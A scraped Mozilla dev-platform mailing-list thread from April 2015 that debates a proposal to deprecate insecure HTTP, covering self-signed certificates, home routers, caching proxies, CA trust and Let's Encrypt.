Another note: Nobody, to within experimental error, uses IP addresses to access public we= bsites. But plenty of people use them for test servers, temporary servers, and embe= dded devices. (My home router is http://192.168.1.254/, do they need to get= a certificate for 192.168.1.254? Or do home routers need to come with inst= allation CDs that install the router's root certificate? How is that not a = worse situation, where every web user has to trust the router manufacturer?= ) And even though nobody uses IP addresses, and many public websites don't wo= rk with IP addresses (because vhosts), nobody in their right mind would eve= r suggest removing the possibility of accessing web servers without domain = names.
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 8:22 AM, Anne van Kesteren <annevk@annevk.nl> wrote: > On Tue, Apr 14, 2015 at 7:52 AM, Yoav Weiss <yoav@yoav.ws> wrote: > > Limiting new features does absolutely nothing in that aspect. > > Hyperbole much? CTO of the New York Times cited HTTP/2 and Service > Workers as a reason to start deploying HTTPS: > > http://open.blogs.nytimes.com/2014/11/13/embracing-https/ I stand corrected. So it's the 8th reason out of 9, right before technical debt. I'm not saying using new features is not an incentive, and I'm definitely not saying HTTP2 and SW should have been enabled on HTTP. But, when done without any real security or deployment issues that mandate it, you're subjecting new features to significant adoption friction that is unrelated to the feature itself, in order to apply some indirect pressure on businesses to do the right thing. You're inflicting developer pain without any real justification. A sort of collective punishment, if you will. If you want to apply pressure, apply it where it makes the most impact with the least cost. Limiting new features to HTTPS is not the place, IMO. > > (And anecdotally, I find it easier to convince developers to deploy > HTTPS on the basis of some feature needing it than on merit. And it > makes sense, if they need their service to do X, they'll go through > the extra trouble to do Y to get to X.) > > Don't convince the developers. Convince the business. Drive users away to secure services by displaying warnings, etc. Anecdotally on my end, I saw small Web sites that care very little about security, move to HTTPS over night after Google added HTTPS as a (weak) ranking signal <http://googlewebmastercentral.blogspot.fr/2014/08/https-as-ranking-signal.html>. (reason #4 in that NYT article)
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 9:51 AM, <lorenzo.keller@gmail.com> wrote: > 1) Caching proxies: resources obtained over HTTPS cannot be cached by a p= roxy that doesn't use MITM certificates. If all users must move to HTTPS th= ere will be no way to re-use content downloaded for one user to accelerate = another user. This is an important issue for locations with many users and = poor internet connectivity. Where is the evidence that this is a problem in practice? What do these environments do for YouTube? > 2) Self signed certificates: in many situations it is hard/impossible to = get certificates signed by a CA (e.g. provisioning embedded devices). The c= urrent approach in many of these situations is not to use HTTPS. If the pla= n goes into effect what other solution could be used? Either something like https://bugzilla.mozilla.org/show_bug.cgi?id=3D1012879 as you mentioned or overrides for local devices. This definitely needs more research but shouldn't preclude rolling out HTTPS on public resources. --=20 https://annevankesteren.nl/
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 9:55 AM, Yoav Weiss <yoav@yoav.ws> wrote: > You're inflicting developer pain without any real justification. A sort of > collective punishment, if you will. Why is that you think there is no justification in deprecating HTTP? >> (And anecdotally, I find it easier to convince developers to deploy >> HTTPS on the basis of some feature needing it than on merit. And it >> makes sense, if they need their service to do X, they'll go through >> the extra trouble to do Y to get to X.) > > Don't convince the developers. Convince the business. Why not both? There's no reason to only attack this top-down. -- https://annevankesteren.nl/
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 10:07 AM, Anne van Kesteren <annevk@annevk.nl> wrote: > On Tue, Apr 14, 2015 at 9:55 AM, Yoav Weiss <yoav@yoav.ws> wrote: > > You're inflicting developer pain without any real justification. A sort > of > > collective punishment, if you will. > > Why is that you think there is no justification in deprecating HTTP? > Deprecating HTTP is totally justified. Enabling some features on HTTP but not others is not, unless there's a real technical reason why these new features shouldn't be enabled. > > > >> (And anecdotally, I find it easier to convince developers to deploy > >> HTTPS on the basis of some feature needing it than on merit. And it > >> makes sense, if they need their service to do X, they'll go through > >> the extra trouble to do Y to get to X.) > > > > Don't convince the developers. Convince the business. > > Why not both? There's no reason to only attack this top-down. > > > -- > https://annevankesteren.nl/ >
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 10:39 AM, Yoav Weiss <yoav@yoav.ws> wrote: > Deprecating HTTP is totally justified. Enabling some features on HTTP but > not others is not, unless there's a real technical reason why these new > features shouldn't be enabled. I don't follow. If HTTP is no longer a first-class citizen, why do we need to treat it as such? -- https://annevankesteren.nl/
![]() |
0 |
![]() |
On Tuesday, April 14, 2015 at 8:44:25 PM UTC+12, Anne van Kesteren wrote: > I don't follow. If HTTP is no longer a first-class citizen, why do we > need to treat it as such? When it takes *more* effort to disable certain features on HTTP, than to let them work.
![]() |
0 |
![]() |
On Tuesday, April 14, 2015 at 8:44:25 PM UTC+12, Anne van Kesteren wrote: > I don't follow. If HTTP is no longer a first-class citizen, why do we > need to treat it as such? When it would take more effort to disable a feature on HTTP than to let it work, and yet the feature is disabled anyway, that's more than just HTTP being "not a first class citizen".
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 10:43 AM, Anne van Kesteren <annevk@annevk.nl> wrote: > On Tue, Apr 14, 2015 at 10:39 AM, Yoav Weiss <yoav@yoav.ws> wrote: > > Deprecating HTTP is totally justified. Enabling some features on HTTP but > > not others is not, unless there's a real technical reason why these new > > features shouldn't be enabled. > > I don't follow. If HTTP is no longer a first-class citizen, why do we > need to treat it as such? > I'm afraid the second class citizens in that scenario would be the new features, rather than HTTP.
![]() |
0 |
![]() |
Op maandag 13 april 2015 16:57:58 UTC+2 schreef Richard Barnes: > There's pretty broad agreement that HTTPS is the way forward for the web. > In recent months, there have been statements from IETF [1], IAB [2], W3C > [3], and even the US Government [4] calling for universal use of > encryption, which in the case of the web means HTTPS. Each organisation has it own reasons to move away from HTTPS. It doesn't mean that each of those reasons are ethical.=20 > In order to encourage web developers to move from HTTP to HTTPS Why ? Large multinationals do not allow HTTPS traffic within their border gateway= s of their own infrastructure, why make it harder for them? Why give people the impression in the future that because they are using HT= TPS they are much safer, but instead the implication are much larger. (no d= ependability anymore, forced to trust root-CA etc..)=20 Why force hosting companies and webmasters with extra costs ? Do not forget that most used webmaster/webhoster controle panels do not sup= port SNI, and that each HTTPS site has to have it own unique IP address.=20 Here in EUROPE we are still using IPv4 and RIPE can't issue new IPv4 addres= s because they are all gone. So as long that isn't resolved it can't be don= e.=20 IMHO HTTPS would be safer if no larger companies or governments are involve= d with issuing the certificates, and the certificates would be free or some= how other wise being compensated.=20 The countries where the people have lesser profiting from HTTPS because hum= an rights are more respected have the means to pay for SSL certificates, bu= t the people who you want to protect don't and even if they would have, the= y always have a government(s) to deal with.=20 As long you think that ROOT-CA are 100% trustworthy and governments can't = manipulate or do a replay attack afterwards, HTTPS is the way to go... unti= l that (and SNI/IPv4) issue are not handled, don't, because it will cause m= ore harm in the long run.=20 Do not get me wrong, the intention is good. But trying to protect humanity = from humanity also means to keep in mind the issues surrounding it.
![]() |
0 |
![]() |
> On 14 Apr 2015, at 11:42, intellectueel@gmail.com wrote: >=20 Something entirely off-topic: I=E2=80=99d like to inform people that = your replies to popular threads like this unsigned, with only a notion = of identity in an obscure email address, makes me - and I=E2=80=99m sure = others too - skip your message or worse; not take it seriously. In my = mind I fantasize your message signed off with something like: "Cheers, mYLitTL3P0nIEZLuLZrAinBowZ. - Sent from a Galaxy Tab Nexuzzz Swift Super, Gold & Ruby Edition by an = 8yr old stuck in Kindergarten.=E2=80=9D =E2=80=A6 which doesn=E2=80=99t feel like the identity anyone would = prefer to assume. Best, Mike.=
![]() |
0 |
![]() |
On 4/14/15 3:28 AM, Anne van Kesteren wrote: > On Tue, Apr 14, 2015 at 4:10 AM, Karl Dubost <kdubost@mozilla.com> wrote: >> 1. You do not need to register a domain name to have a Web site (IP address) > > Name one site you visit regularly that doesn't have a domain name. My router's configuration UI. Here "regularly" is probably once a month or so. > And even then, you can get certificates for public IP addresses. It's not a public IP address. We do need a solution for this space, which I expect includes the various embedded devices people are bringing up; I expect those are behind firewalls more often than on the publicly routable internet. -Boris
![]() |
0 |
![]() |
> Something entirely off-topic: I'd like to inform people that your replies= to popular threads like this unsigned, with only a notion of identity in a= n obscure email address, makes me - and I'm sure others too - skip your mes= sage or worse; not take it seriously.=20 Not everyone has the luxury of being public on the Internet. Especially in= discussions about default Internet encryption. The real decision makers w= on't be posting at all.
![]() |
0 |
![]() |
Joshua Cranmer 🐧 wrote: > If you actually go to read the details of the proposal rather than > relying only on the headline, you'd find that there is an intent to > actually let you continue to use http for, e.g., localhost. The exact > boundary between "secure" HTTP and "insecure" HTTP is being actively > discussed in other forums. My main concern with the notion of phasing out unsecured HTTP is that doing so will cripple or eliminate Internet access by older devices that aren't generally capable of handling encryption and decryption on such a massive scale in real time. While it may sound silly, those of us who are intro classic computers and making them do fun new things use HTTP to connect 10 MHz (or even 1 MHz) machines to the Internet. These machines can't handle the demands of SSL. So this is a step toward making their Internet connections go away. This may not be enough of a reason to save HTTP, but it's something I wanted to point out. -- Eric Shepherd Senior Technical Writer Mozilla <https://www.mozilla.org/> Blog: http://www.bitstampede.com/ Twitter: http://twitter.com/sheppy
![]() |
0 |
![]() |
On Tuesday, April 14, 2015 at 3:05:09 AM UTC-5, Anne van Kesteren wrote: > This definitely needs more research > but shouldn't preclude rolling out HTTPS on public resources. The proposal as presented is not limited to public resources. The W3C Privi= leged Context draft which it references exempts only localhost and file:///= resources, not resources on private networks. There are hundreds of millio= ns of home routers and similar devices with web UIs on private networks, an= d no clear path under this proposal to keep them fully accessible (without = arbitrary feature limitations) except to set up your own local CA, which is= excessively burdensome. Eli Naeher
![]() |
0 |
![]() |
On 14/04/15 01:57, northrupthebandgeek@gmail.com wrote: > * Less scary warnings about self-signed certificates (i.e. treat > HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do > with HTTPS+selfsigned now); the fact that self-signed HTTPS is > treated as less secure than HTTP is - to put this as politely and > gently as possible - a pile of bovine manure http://gerv.net/security/self-signed-certs/ , section 3. But also, Firefox is implementing opportunistic encryption, which AIUI gives you a lot of what you want here. Gerv
![]() |
0 |
![]() |
On 14/04/15 08:51, lorenzo.keller@gmail.com wrote: > 1) Caching proxies: resources obtained over HTTPS cannot be cached by > a proxy that doesn't use MITM certificates. If all users must move to > HTTPS there will be no way to re-use content downloaded for one user > to accelerate another user. This is an important issue for locations > with many users and poor internet connectivity. Richard talked, IIRC, about not allowing subloads over HTTP with subresource integrity. This is one argument to the contrary. Sites could use HTTP-with-integrity to provide an experience which allowed for better caching, with the downside being some loss of coarse privacy for the user. (Cached resources, by their nature, are not going to be user-specific, so there won't be leak of PII. But it might leak what you are reading or what site you are on.) Gerv
![]() |
0 |
![]() |
I'm curious as to what would happen with things that cannot have TLS certificates: routers and similar web-configurable-only devices (like small PBX-like devices, etc). They don't have a proper domain, and may grab an IP via radvd (or dhcp on IPv4), so there's no certificate to be had. They'd have to use self-signed, which seems to be treated pretty badly (warning message, etc). Would we be getting rid of the self-signed warning when visiting a website?
![]() |
0 |
![]() |
On Mon, Apr 13, 2015 at 5:11 PM, <bryan.beicker@gmail.com> wrote: > One limiting factor is that Firefox doesn't treat form data the same on > HTTPS sites. > > Examples: > > > http://stackoverflow.com/questions/14420624/how-to-keep-changed-form-content-when-leaving-and-going-back-to-https-page-wor > > > http://stackoverflow.com/questions/10511581/why-are-html-forms-sometimes-cleared-when-clicking-on-the-browser-back-button > > After loosing a few forum posts or wiki edits to this bug in Firefox, you > quickly insist on using unsecured HTTP as often as possible. > Interesting observation. ISTM that that's a bug in HTTPS. At least I don't see an obvious security reason for the behavior to be that way. More generally: I expect that this process will turn up bugs in HTTPS behavior, either "actual" bugs in terms of implementation errors, or "logical" bugs where the intended behavior does not meet the expectations or needs of websites. So we should be open to adapting our HTTPS behavior some (within the bounds of the security requirements) in order to facilitate this transition. --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
On Mon, Apr 13, 2015 at 7:03 PM, Martin Thomson <mt@mozilla.com> wrote: > On Mon, Apr 13, 2015 at 3:53 PM, Eugene <imfasterthanneutrino@gmail.com> > wrote: > > In addition to APIs, I'd like to propose prohibiting caching any > resources loaded over insecure HTTP, regardless of Cache-Control header, in > Phase 2.N. > > This has some negative consequences (if only for performance). I'd > like to see changes like this properly coordinated. I'd rather just > treat "caching" as one of the features for Phase 2.N. > That seem sensible. I was about to propose a lifetime limit on caching (say a few hours?) to limit the persistence scope of MitM, i.e., require periodic re-infection. There may be ways to circumvent this (e.g., the MitM's code sending cache priming requests), but it seems incrementally better. --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
On Mon, Apr 13, 2015 at 9:43 PM, <imfasterthanneutrino@gmail.com> wrote: > On Monday, April 13, 2015 at 8:57:41 PM UTC-4, northrupt...@gmail.com > wrote: > > > > * Less scary warnings about self-signed certificates (i.e. treat > HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with > HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less > secure than HTTP is - to put this as politely and gently as possible - a > pile of bovine manure > > This feature (i.e. opportunistic encryption) was implemented in Firefox > 37, but unfortunately an implementation bug made HTTPS insecure too. But I > guess Mozilla will fix it and make this feature available in a future > release. > > > * Support for a decentralized (blockchain-based, ala Namecoin?) > certificate authority > > > > Basically, the current CA system is - again, to put this as gently and > politely as possible - fucking broken. Anything that forces the world to > rely on it exclusively is not a solution, but is instead just going to make > the problem worse. > > I don't think the current CA system is broken. The domain name > registration is also centralized, but almost every website has a hostname, > rather than using IP address, and few people complain about this. > I would also note that Mozilla is contributing heavily to Let's Encrypt, which is about as close to a decentralized CA as we can get with current technology. If people have ideas for decentralized CAs, I would be interested in listening, and possibly adding support in the long run. But unfortunately, the state of the art isn't quite there yet. --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
On Mon, Apr 13, 2015 at 11:26 PM, <ipartola@gmail.com> wrote: > > * Less scary warnings about self-signed certificates (i.e. treat > HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with > HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less > secure than HTTP is - to put this as politely and gently as possible - a > pile of bovine manure > > I am against this. Both are insecure and should be treated as such. How is > your browser supposed to know that gmail.com is intended to serve a > self-signed cert? It's not, and it cannot possibly know it in the general > case. Thus it must be treated as insecure. > This is a good point. This is exactly why the opportunistic security feature in Firefox 37 enables encryption without certificate checks for *http* resources. --Richard > > * Support for a decentralized (blockchain-based, ala Namecoin?) > certificate authority > > No. Namecoin has so many other problems that it is not feasible. > > > Basically, the current CA system is - again, to put this as gently and > politely as possible - fucking broken. Anything that forces the world to > rely on it exclusively is not a solution, but is instead just going to make > the problem worse. > > Agree that it's broken. The fact that any CA can issue a cert for any > domain is stupid, always was and always will be. It's now starting to bite > us. > > However, HTTPS and the CA system don't have to be tied together. Let's > ditch the immediately insecure plain HTTP, then add ways to authenticate > trusted certs in HTTPS by means other than our current CA system. The two > problems are orthogonal, and trying to solve both at once will just leave > us exactly where we are: trying to argue for a fundamentally different > system. > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
On Mon, Apr 13, 2015 at 10:10 PM, Karl Dubost <kdubost@mozilla.com> wrote: > > Le 14 avr. 2015 =C3=A0 10:43, imfasterthanneutrino@gmail.com a =C3=A9crit= : > > I don't think the current CA system is broken. > > The current CA system creates issues for certain categories of population= .. > It is broken in some ways. > > > The domain name registration is also centralized, but almost every > website has a hostname, rather than using IP address, and few people > complain about this. > > Two points: > > 1. You do not need to register a domain name to have a Web site (IP > address) > 2. You do not need to register a domain name to run a local blah.test.sit= e > > Both are still working and not deprecated in browsers ^_^ > > Now the fact to have to rent your domain name ($$$) and that all the URIs > are tied to this is in terms of permanent identifiers and the fabric of > time on information has strong social consequences. But's that another > debate than the one of this thread on deprecating HTTP in favor of HTTPS. > This is a fair point, and we should probably figure out a way to accommodate these. My inclination is to mostly punt this to manual configuration (e.g., installing a new trusted cert/override), since we're not talking about generally available public service on the Internet. But if there are more elegant solutions that don't reduce security, I would be interested to hear them. > I would love to see this discussion happening in Whistler too. > Agreed. That sounds like an excellent opportunity to hammer out details here, assuming we can agree on overall direction in the meantime. --Richard > > -- > Karl Dubost, Mozilla > http://www.la-grange.net/karl/moz > > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 3:55 AM, Yoav Weiss <yoav@yoav.ws> wrote: > On Tue, Apr 14, 2015 at 8:22 AM, Anne van Kesteren <annevk@annevk.nl> > wrote: > > > On Tue, Apr 14, 2015 at 7:52 AM, Yoav Weiss <yoav@yoav.ws> wrote: > > > Limiting new features does absolutely nothing in that aspect. > > > > Hyperbole much? CTO of the New York Times cited HTTP/2 and Service > > Workers as a reason to start deploying HTTPS: > > > > http://open.blogs.nytimes.com/2014/11/13/embracing-https/ > > > I stand corrected. So it's the 8th reason out of 9, right before technical > debt. > > I'm not saying using new features is not an incentive, and I'm definitely > not saying HTTP2 and SW should have been enabled on HTTP. > But, when done without any real security or deployment issues that mandate > it, you're subjecting new features to significant adoption friction that is > unrelated to the feature itself, in order to apply some indirect pressure > on businesses to do the right thing. > Please note that there is no inherent security reason to limit HTTP/2 to be used only over TLS (as there is for SW), at least not any more than the security reasons for carrying HTTP/1.1 over TLS. They're semantically equivalent; HTTP/2 is just faster. So if you're OK with limiting HTTP/2 to TLS, you've sort of already bought into the strategy we're proposing here. > You're inflicting developer pain without any real justification. A sort of > collective punishment, if you will. > > If you want to apply pressure, apply it where it makes the most impact with > the least cost. Limiting new features to HTTPS is not the place, IMO. > I would note that these options are not mutually exclusive :) We can apply pressure with feature availability at the same time that we work on the ecosystem problems. In fact, I had a call with some advertising folks last week about how to get the ad industry upgraded to HTTPS. --Richard > > > > > > (And anecdotally, I find it easier to convince developers to deploy > > HTTPS on the basis of some feature needing it than on merit. And it > > makes sense, if they need their service to do X, they'll go through > > the extra trouble to do Y to get to X.) > > > > > Don't convince the developers. Convince the business. Drive users away to > secure services by displaying warnings, etc. > Anecdotally on my end, I saw small Web sites that care very little about > security, move to HTTPS over night after Google added HTTPS as a (weak) > ranking signal > < > http://googlewebmastercentral.blogspot.fr/2014/08/https-as-ranking-signal.html > >. > (reason #4 in that NYT article) > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 8:32 AM, Eric Shepherd <eshepherd@mozilla.com> wrote: > Joshua Cranmer [image: =F0=9F=90=A7] wrote: > >> If you actually go to read the details of the proposal rather than >> relying only on the headline, you'd find that there is an intent to >> actually let you continue to use http for, e.g., localhost. The exact >> boundary between "secure" HTTP and "insecure" HTTP is being actively >> discussed in other forums. >> > My main concern with the notion of phasing out unsecured HTTP is that > doing so will cripple or eliminate Internet access by older devices that > aren't generally capable of handling encryption and decryption on such a > massive scale in real time. > > While it may sound silly, those of us who are intro classic computers and > making them do fun new things use HTTP to connect 10 MHz (or even 1 MHz) > machines to the Internet. These machines can't handle the demands of SSL. > So this is a step toward making their Internet connections go away. > > This may not be enough of a reason to save HTTP, but it's something I > wanted to point out. As the owner of a Mac SE/30 with an 100MB Ethernet card, I sympathize. However, consider it part of the challenge! :) There are definitely TLS stacks that work on some pretty small devices. --Richard > > > -- > > Eric Shepherd > Senior Technical Writer > Mozilla <https://www.mozilla.org/> > Blog: http://www.bitstampede.com/ > Twitter: http://twitter.com/sheppy > > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 9:57 AM, <hugoosvaldobarrera@gmail.com> wrote: > I'm curious as to what would happen with things that cannot have TLS > certificates: routers and similar web-configurable-only devices (like small > PBX-like devices, etc). > > They don't have a proper domain, and may grab an IP via radvd (or dhcp on > IPv4), so there's no certificate to be had. > > They'd have to use self-signed, which seems to be treated pretty badly > (warning message, etc). > > Would we be getting rid of the self-signed warning when visiting a website? > Well, no. :) Note that the primary difference between opportunistic security (which is HTTP) and HTTPS is authentication. We should think about what sorts of expectations people have for these devices, and to what degree those expectations can be met. Since you bring up IPv6, there might be some possibility that devices could authenticate their IP addresses automatially, using cryptographically generated addresses and self-signed certificates using the same public key. http://en.wikipedia.org/wiki/Cryptographically_Generated_Address --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
Dynamic DNS might be difficult to run on HTTPS as the IP address needs to change when say your cable modem IP updates. HTTPS only would make running personal sites more difficult for individuals, and would make the internet slightly less democratic. On Monday, April 13, 2015 at 7:57:58 AM UTC-7, Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. > In recent months, there have been statements from IETF [1], IAB [2], W3C > [3], and even the US Government [4] calling for universal use of > encryption, which in the case of the web means HTTPS. > > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security. > Broadly speaking, this plan would entail limiting new features to secure > contexts, followed by gradually removing legacy features from insecure > contexts. Having an overall program for HTTP deprecation makes a clear > statement to the web community that the time for plaintext is over -- it > tells the world that the new web uses HTTPS, so if you want to use new > things, you need to provide security. Martin Thomson and I drafted a > one-page outline of the plan with a few more considerations here: > > https://docs.google.com/document/d/1IGYl_rxnqEvzmdAP9AJQYY2i2Uy_sW-cg9QI9ICe-ww/edit?usp=sharing > > Some earlier threads on this list [5] and elsewhere [6] have discussed > deprecating insecure HTTP for "powerful features". We think it would be a > simpler and clearer statement to avoid the discussion of which features are > "powerful" and focus on moving all features to HTTPS, powerful or not. > > The goal of this thread is to determine whether there is support in the > Mozilla community for a plan of this general form. Developing a precise > plan will require coordination with the broader web community (other > browsers, web sites, etc.), and will probably happen in the W3C. > > Thanks, > --Richard > > [1] https://tools.ietf.org/html/rfc7258 > [2] > https://www.iab.org/2014/11/14/iab-statement-on-internet-confidentiality/ > [3] https://w3ctag.github.io/web-https/ > [4] https://https.cio.gov/ > [5] > https://groups.google.com/d/topic/mozilla.dev.platform/vavZdN4tX44/discussion > [6] > https://groups.google.com/a/chromium.org/d/topic/blink-dev/2LXKVWYkOus/discussion
![]() |
0 |
![]() |
On 4/14/15 10:53, justin.kruger@gmail.com wrote: > Dynamic DNS might be difficult to run on HTTPS as the IP address needs to change when say your cable modem IP updates. HTTPS only would make running personal sites more difficult for individuals, and would make the internet slightly less democratic. I'm not sure I follow. I have a cert for a web site running on a dynamic address using DynDNS, and it works just fine. Certs are bound to names, not addresses. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
![]() |
0 |
![]() |
On 4/14/15 11:53 AM, justin.kruger@gmail.com wrote: > Dynamic DNS might be difficult to run on HTTPS as the IP address needs to change when say your cable modem IP updates. Justin, I'm not sure I follow the problem here. If I understand correctly, you're talking about a domain name, say "foo.bar", which is mapped to different IPs via dynamic DNS, and a website running on the machine behind the relevant cable modem, right? Is the site being accessed directly via the IP address or via the foo.bar hostname? Because if it's the latter, then a cert issued to foo.bar would work fine as the IP changes; certificates are bound to a hostname string (which can happen to have the form "123.123.123.123", of course), not an IP address. And if the site is being accessed via (changeable) IP address, then how is dynamic DNS relevant? I would really appreciate an explanation of what problem you're seeing here that I'm missing. -Boris
![]() |
0 |
![]() |
Hi Mozilla friends. Glad to see this proposal! As Richard mentions, we over= on Chromium are working on a similar plan, albeit limited to "powerful fea= tures."=20 I just wanted to mention that regarding subresource integrity (https://w3c.= github.io/webappsec/specs/subresourceintegrity/), the general consensus ove= r here is that we will not treat origins as secure if they are over HTTP bu= t loaded with integrity. We believe that security includes confidentiality,= which that would approach would lack. --Joel
![]() |
0 |
![]() |
> We believe that security includes confidentiality, which that would appro= ach would lack. Hey Joel, SSL already leaks which domain name you are visiting anyway, so the most co= nfidentiality this can bring you is hiding the specific URL involved in a c= ache miss. That's a fairly narrow upgrade to confidentiality. A scenario where it would matter: a MITM wishes to block viewing of a speci= fic video on a video hosting site, but is unwilling to block the whole site= .. In such cases you would indeed want full SSL, assuming the host can affor= d it. A scenario where it would not matter: some country wishes to fire a Great C= annon. There integrity is enough. I think the case for requiring integrity for all connections is strong: mal= ware injection is simply not on. The case for confidentiality of user data = and cookies is equally clear. The case for confidentiality of cache misses = of static assets is a bit less clear: sites that host a lot of very differ= ent content like YouTube might care and a site where all the content is the= same (e.g. a porn site) might feel the difference between a URL and a doma= in name is so tiny that it's irrelevant - they'd rather have the performanc= e improvements from caching proxies. Sites that have a lot of users in deve= loping countries might also feel differently to Google engineers with works= tations hard-wired into the internet backbone ;) Anyway, just my 2c.
![]() |
0 |
![]() |
Richard Barnes wrote: > As the owner of a Mac SE/30 with an 100MB Ethernet card, I > sympathize. However, consider it part of the challenge! :) There > are definitely TLS stacks that work on some pretty small devices. That's a lot faster machine than the ones I play with. My fastest retro machine is an 8-bit unit with a 10 MHz processor and 4 MB of memory, with a 10 Mbps ethernet card. And the ethernet is underutilized because the bus speed of the computer is too slow to come anywhere close to saturating the bandwidth available. :) -- Eric Shepherd Senior Technical Writer Mozilla <https://www.mozilla.org/> Blog: http://www.bitstampede.com/ Twitter: http://twitter.com/sheppy
![]() |
0 |
![]() |
HTTPS has its moments, but the majority of the web does not need it. I cert= ainly wouldn't appreciate the encryption overhead just for visiting David's= lolcats website. As one of the most important organizations related to fre= e software, it's sad to see Mozilla developers join the war on plaintext: h= ttp://arc.pasp.de/ The owners of websites like this have a right to serve t= heir pages in formats that do not make hypocrites of themselves.
![]() |
0 |
![]() |
Hello,=20 On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote: > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security= .. > > <snip> >=20 > Thanks, > --Richard While I fully understand what's at stake here and the reasoning behind this= , I'd like to ask an admittedly troll-like question :=20 Will Mozilla start to offer certificates to every single domain name owne= r ? Without that, your proposal tells me: either you pay for a certificate or y= ou don't use the latest supported features on your personal (or professiona= l) web site. This is a call for a revival of the "best viewed with XXX brow= ser" banners.=20 Making the warning page easier to bypass is a very, very bad idea. The warn= ing page is here for a very good reason, and its primary function is to sca= re non-technical literate people so that they don't put themselves in dange= r. Make it less scary and you'll get the infamous Windows Vista UAC dialog = boxes where people click OK without even reading the content. The proposal fails to foresee another consequence of a full HTTPS web: the = rise and fall of root CAs. If everyone needs to buy a certificate you can b= e sure that some companies will sell them for a low price, with limited bac= kground check. These companies will be spotted - and their root CA will be = revoked by browser vendors (this already happened in the past and I fail to= see any reason why it would not happen again). Suddenly, a large portion o= f the web will be seen as even worse than "insecure HTTP" - it will be seen= as "potentially dangerous HTTPS". The only way to avoid this situation is = to put all the power in a very limited number of hands - then you'll witnes= s a sharp rise on certificate prices. Finally, Mozilla's motto is to keep the web open. Requiring one to pay a fe= e - even if it's a small one - in order to allow him to have a presence on = the Intarweb is not helping. Best regards,=20 -- Emmanuel Deloget
![]() |
0 |
![]() |
On 4/14/15 15:35, emmanueldeloget53@gmail.com wrote: > Will Mozilla start to offer certificates to every single domain name owner ? Yes [1]. https://letsencrypt.org/ ____ [1] I'll note that Mozilla is only one of several organizations involved in making this effort happen. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 8:26:59 PM UTC-7, ipar...@gmail.com wrote: > > * Less scary warnings about self-signed certificates (i.e. treat HTTPS+= selfsigned like we do with HTTP now, and treat HTTP like we do with HTTPS+s= elfsigned now); the fact that self-signed HTTPS is treated as less secure t= han HTTP is - to put this as politely and gently as possible - a pile of bo= vine manure >=20 > I am against this. Both are insecure and should be treated as such. How i= s your browser supposed to know that gmail.com is intended to serve a self-= signed cert? It's not, and it cannot possibly know it in the general case. = Thus it must be treated as insecure. Except that one is encrypted, and the other is not. *By logical measure*, = the one that is encrypted but unauthenticated is more secure than the one t= hat is neither encrypted nor authenticated, and the fact that virtually eve= ry HTTPS-supporting browser assumes the precise opposite is mind-boggling. I agree that authentication/verification is necessary for security, but to = pretend that encryption is a non-factor when it's the only actual subject o= f this thread as presented by its creator is asinine. >=20 > > * Support for a decentralized (blockchain-based, ala Namecoin?) certifi= cate authority >=20 > No. Namecoin has so many other problems that it is not feasible. Like? And I'm pretty sure none of those problems (if they even exist) even remote= ly compare to the clusterfsck that is our current CA system. >=20 > > Basically, the current CA system is - again, to put this as gently and = politely as possible - fucking broken. Anything that forces the world to r= ely on it exclusively is not a solution, but is instead just going to make = the problem worse. >=20 > Agree that it's broken. The fact that any CA can issue a cert for any dom= ain is stupid, always was and always will be. It's now starting to bite us. >=20 > However, HTTPS and the CA system don't have to be tied together. Let's di= tch the immediately insecure plain HTTP, then add ways to authenticate trus= ted certs in HTTPS by means other than our current CA system. The two probl= ems are orthogonal, and trying to solve both at once will just leave us exa= ctly where we are: trying to argue for a fundamentally different system. Indeed they don't, but with the current ecosystem they are, which is my poi= nt; by deprecating HTTP *and* continuing to treat self-signed certs as lite= rally worse than Hitler *and* relying on the current CA system exclusively = for verification of certificates, we're doing nothing to actually solve any= thing. As orthogonal as those problems may seem, an HTTPS-only world will fail rat= her spectacularly without significant reform and refactoring on the CA side= of things.
![]() |
0 |
![]() |
